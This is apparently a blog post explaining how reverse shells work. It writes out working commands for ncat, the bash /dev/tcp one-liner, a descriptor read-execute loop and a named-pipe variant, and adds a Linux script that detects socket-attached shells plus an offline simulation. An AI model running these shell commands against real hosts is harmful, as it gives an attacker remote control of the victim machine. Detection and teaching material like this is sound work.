reverse shell
A reverse shell: the attacking end (the local machine) listens on a TCP or UDP port, the victim end (the target server) initiates a connection to that port and redirects the input and output of its command line to the controlling end. Compared with standard shells such as telnet or ssh, where the operator connects in, a reverse shell is essentially the network client and server roles swapped. The practical reason is that an outbound connection from the target usually passes firewalls and NAT that would block an inbound one.

ncat:

attacker (listen on 5555 and keep listening after a client disconnects):

ncat --listen --source-port 5555 --keep-open

victim (connect back to the attacker's IP and hand the connection to a shell; IP and 5555 must match the listener):

ncat --exec /bin/bash IP 5555

Without ncat on the victim, bash alone can do the same through its /dev/tcp pseudo-device (intrinsic is the attacker's host name here):

bash -i >& /dev/tcp/intrinsic/5555 0<&1

This runs a new interactive bash (bash -i) whose standard output and standard error are redirected to a TCP connection to the given host and port (>& /dev/tcp/HOST/PORT); bash opens the connection itself and it lasts for the lifetime of the bash process. Standard input is then duplicated from that same descriptor (0<&1).

The widely copied form 0>&1 works just as well: both operators duplicate descriptor 1 onto descriptor 0, and because the socket descriptor is already open for reading and writing, the direction implied by < or > makes no difference.
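The artifact this leaves on the victim is what a responder looks for: a shell process whose descriptors 0, 1 and 2 point at a socket instead of a pty or a pipe. On Linux that is visible in /proc/PID/fd without any extra tooling. The script below is an added example, not part of the original post; it assumes a Linux /proc layout and a readlink binary, and the list of shell names and the fake process tree are constructed for illustration. Reading other users' /proc/PID/fd needs root. Note the caveat that the named-pipe variant further down does not match this check, because there ncat holds the socket and bash only sees pipes; for that one, look for a shell whose sibling or child is ncat/nc.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): flag shells whose stdin/stdout/
# stderr are sockets, the footprint of the /dev/tcp and ncat --exec variants.
#
#   find_socket_shells PROCROOT
#
# PROCROOT is normally /proc. It is a parameter so the logic can be exercised
# against a constructed directory tree (make_fake_proc) without a real victim.
# Prints one "PID COMM" line per shell whose fd 0, 1 or 2 reads "socket:[...]".

set -u

# Process names treated as shells (assumption: extend for your environment).
SHELL_NAMES=" sh bash dash zsh ksh ash "

find_socket_shells() {
    local root="$1" piddir pid comm fd target hit
    for piddir in "$root"/[0-9]*; do
        [ -d "$piddir" ] || continue
        pid=${piddir##*/}
        # /proc/PID/comm is the (15-char truncated) executable name
        comm=$(cat "$piddir/comm" 2>/dev/null) || continue
        case "$SHELL_NAMES" in
            *" $comm "*) ;;
            *) continue ;;
        esac
        hit=0
        for fd in 0 1 2; do
            # fd entries are symlinks; a socket shows up as "socket:[inode]"
            target=$(readlink "$piddir/fd/$fd" 2>/dev/null) || continue
            case "$target" in
                socket:\[*\]) hit=1 ;;
            esac
        done
        if [ "$hit" -eq 1 ]; then
            printf '%s %s\n' "$pid" "$comm"
        fi
    done
    return 0
}

# make_fake_proc DIR: constructed /proc look-alike with three processes:
#   4242 bash  - stdin/stdout/stderr on a socket (reverse shell, should be flagged)
#   1000 bash  - on a pty (ordinary login shell, must not be flagged)
#   2000 nginx - on a socket but not a shell (must not be flagged)
make_fake_proc() {
    local root="$1"
    mkdir -p "$root/4242/fd" "$root/1000/fd" "$root/2000/fd"
    echo bash > "$root/4242/comm"
    ln -s 'socket:[98765]' "$root/4242/fd/0"
    ln -s 'socket:[98765]' "$root/4242/fd/1"
    ln -s 'socket:[98765]' "$root/4242/fd/2"
    echo bash > "$root/1000/comm"
    ln -s /dev/pts/0 "$root/1000/fd/0"
    ln -s /dev/pts/0 "$root/1000/fd/1"
    ln -s /dev/pts/0 "$root/1000/fd/2"
    echo nginx > "$root/2000/comm"
    ln -s /dev/null "$root/2000/fd/0"
    ln -s 'socket:[11111]' "$root/2000/fd/1"
    ln -s 'socket:[11111]' "$root/2000/fd/2"
}
```

Usage on a live host: `find_socket_shells /proc` (as root). To see the check trip on the constructed tree: `d=$(mktemp -d); make_fake_proc "$d"; find_socket_shells "$d"` prints `4242 bash` and nothing else.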

A quick reachability check before going further: run this on the victim and the listener should print "b c".

echo b c > /dev/tcp/HOST/PORT

A variant that keeps the socket on a dedicated descriptor. exec 5<> opens descriptor 5 for both reading and writing on the TCP connection; the loop reads one line at a time from it, executes the line, and sends stdout and stderr back over the same descriptor:

exec 5<> /dev/tcp/HOST/PORT

cat <&5 | while read line; do
    $line >&5 2>&1
done

Because $line is expanded by word splitting rather than re-parsed by the shell, each received line runs as one command with arguments: pipes, quotes and redirections in the line are not interpreted (bash -c "$line" in place of $line would lift that limitation).


file=$(mktemp --dry-run -p /tmp --suffix .pipe tmp.XXX)

mkfifo --mode=700 $file

cat $file | bash -i 2>&1 | ncat HOST PORT > $file

The named pipe carries the command channel: cat reads whatever arrives in the pipe and feeds it to bash, bash executes it with stderr merged into stdout, ncat ships that output to the attacker, and whatever the attacker types comes back out of ncat's stdout and is written into the pipe, closing the loop. mktemp --dry-run only prints a name without creating the file, so mkfifo can create it as a pipe rather than fail on an existing regular file; --mode=700 keeps other local users from writing commands into it.
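To make that plumbing visible without a network, here is an added example (not from the original post) that runs the same cat | bash | ... > $file loop locally, with a shell function fake_c2 standing in for ncat and the attacker's terminal. The three commands fake_c2 sends are constructed sample input, and the __C2_DONE__ sentinel it appends to each command is an assumption of this example (a scripted C2 needs some end-of-output marker; a human operator just waits for the prompt). run_fifo_shell returns the path of a log showing what the attacker side received.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: the named-pipe reverse-shell loop
# with a local stand-in for ncat so the data flow can be watched offline.
#
#   cat "$fifo" | bash 2>&1 | fake_c2 "$log" > "$fifo"
#
# fake_c2 writes a command into the FIFO -> cat feeds it to bash -> bash's
# stdout and stderr flow into fake_c2 -> fake_c2 records them and sends the
# next command. That is exactly what ncat does with the attacker's terminal,
# minus the TCP connection.

set -u

# Sentinel appended to every command so fake_c2 knows when its output is
# complete (assumption of this example, not part of the original recipe).
DONE_MARKER="__C2_DONE__"

# fake_c2 LOGFILE
#   stdin  = the victim shell's combined stdout/stderr
#   stdout = the victim shell's stdin (the FIFO)
# The commands to send are constructed sample input, read from fd 3 so that
# stdin stays attached to the victim's output.
fake_c2() {
    local log="$1" cmd line
    while IFS= read -r cmd <&3; do
        printf '%s; echo %s\n' "$cmd" "$DONE_MARKER"   # goes into the FIFO
        printf '$ %s\n' "$cmd" >> "$log"                # what the operator typed
        while IFS= read -r line; do                      # what came back
            [ "$line" = "$DONE_MARKER" ] && break
            printf '%s\n' "$line" >> "$log"
        done
    done 3<<'EOF'
echo hello from victim
printf 'a\nb\n'
echo oops >&2
EOF
    echo exit   # tell the victim shell to quit; its exit tears the loop down
}

# run_fifo_shell: create the FIFO the way the post does (a fresh name, then
# mkfifo), run the loop, clean up, and print the path of the captured log.
run_fifo_shell() {
    local fifo log
    fifo=$(mktemp -u /tmp/rsh.XXXXXX)     # name only; mkfifo creates the pipe
    log=$(mktemp /tmp/c2log.XXXXXX)
    mkfifo -m 700 "$fifo"
    cat "$fifo" | bash 2>&1 | fake_c2 "$log" > "$fifo"
    rm -f "$fifo"
    printf '%s\n' "$log"
}
```

Run `cat "$(run_fifo_shell)"` to see the log: each `$ command` line followed by the output bash produced, including the `oops` line that went to stderr and was captured only because of the `2>&1`. Non-interactive `bash` is used instead of `bash -i` so the log is not cluttered with prompts and job-control warnings; the plumbing is identical.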

Posted by ascertain